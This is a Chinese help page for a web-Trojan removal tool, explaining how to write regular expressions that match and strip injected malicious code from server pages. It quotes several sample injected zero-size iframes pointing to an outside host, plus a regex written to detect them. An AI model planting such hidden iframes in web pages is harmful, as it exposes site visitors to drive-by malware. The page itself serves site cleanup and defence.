龙盾 - “飞豹网页挂马清除器”

 

  • 待删字符串设置规则说明:
    由于被挂的网马地址可能并不完全一致,但也并非完全不同,而是有一定规律,所以,待删除的字符串一般使用“正则表达式”,这样就可以彻底清除服务器上所有“同类”的网页木马,现在先介绍“正则表达式”使用的常用原则,然后再以具体示例,来说明如何书写待删除的字符串。

网页木马中的字符

 对应的“正则表达式”
. \.
? \?
\ \\
( \(
任意一个0-9的数字 [0-9]
此外:
*: 表示有0个或多个字符。
+: 表示至少有一个字符。

 

  • 待删字符串设置举例:
    假如:
    AAA.asp中的网页木马为:<ifrAme src=hTTp://aaa.888xxmm.cn/new    9999.hTm?0225 wiDth=0 naMe='789' height=0></ifraMe>
    BBB.asp中的网页木马为:<ifrAme src=hTTp://aaa.888xxmm.cn/new    3423.hTm?0892 wiDth=0 naMe='912' height=0></ifraMe>
    CCC.asp中的网页木马为:<ifrAme src=hTTp://aaa.888xxmm.cn/new    2354.hTm?7762 wiDth=0 naMe='289' height=0></ifraMe>
    ...

    以此类推。

    显然,网页木马不是唯一的(数字是变化的,如上面网页木马的红色部分),所以,不能将待删除的字符串写死,这时,就需要使用“正则表达式”来设置待删字符串。
针对上面的分析,很容易写出待删除的字符串的“正则表达式”:

<ifrAme src=hTTp://aaa\.888xxmm\.cn/new[0-9]+\.hTm\?[0-9]+ wiDth=0 naMe='[0-9]+' height=0></ifraMe>


如需更进一步帮助,请联系客服。
QQ:349741759

 

                                                                     主页